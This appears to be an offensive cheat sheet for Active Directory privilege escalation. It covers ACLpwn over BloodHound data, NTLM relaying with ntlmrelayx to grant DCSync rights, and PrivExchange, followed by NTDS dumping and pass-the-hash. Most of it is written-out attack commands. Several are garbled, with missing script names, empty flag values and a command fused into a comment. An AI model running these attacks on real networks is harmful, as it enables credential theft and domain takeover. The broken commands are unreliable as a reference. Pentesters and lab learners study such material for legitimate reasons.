# After exploitation, you won't be like Domain Admin directly, so, you won't be able to connect to the
# DC using Domain Admins rights.
# Exploitation allows user to get DCSync privileges, which is enough to get the NTDS Database
# You can then use Pass the Hash attack with administrators accounts to get real access


# ACLpwn is a tool used to find compromission paths inside BloodHound data and to exploit them
# BloodHound need to be running
# Many options are available

# Dry option is used to look for compromission without exploiting it
python -f -ft user -d -u user -p password -sp password -du neo4j -dp password -dry

# Default, exploitation is started
python -f -ft user -d -u user -p password -sp password -du neo4j -dp password

# You can restore previous privileges after exploitation
python -r restore-file

ntlmrelayx /

# NTLM relaying is used to relay connexion and give DCSync privileges -t ldap://s2016dc.testsegment.local --escalate-user ntu

# User need to have a mailbox to exploit this way
# After a minute (which is the value supplied for the push notification) you can get results in ntlmrelayx
python -ah dev.testsegment.local s2012exc.testsegment.local -u testuser -d testsegment.local

# You can also perform the attack without getting any credentials
# Using the file
# It uses NTLM Relaying with LLMNR / NBT-NS to relay captured credentials over the network


# All in One tools of privexchange
# You only need to open the web server port, so no high privileges are required.

# Many options available
python -ah attackterip -ap listenport -u user -p password -d -th DCip MailServerip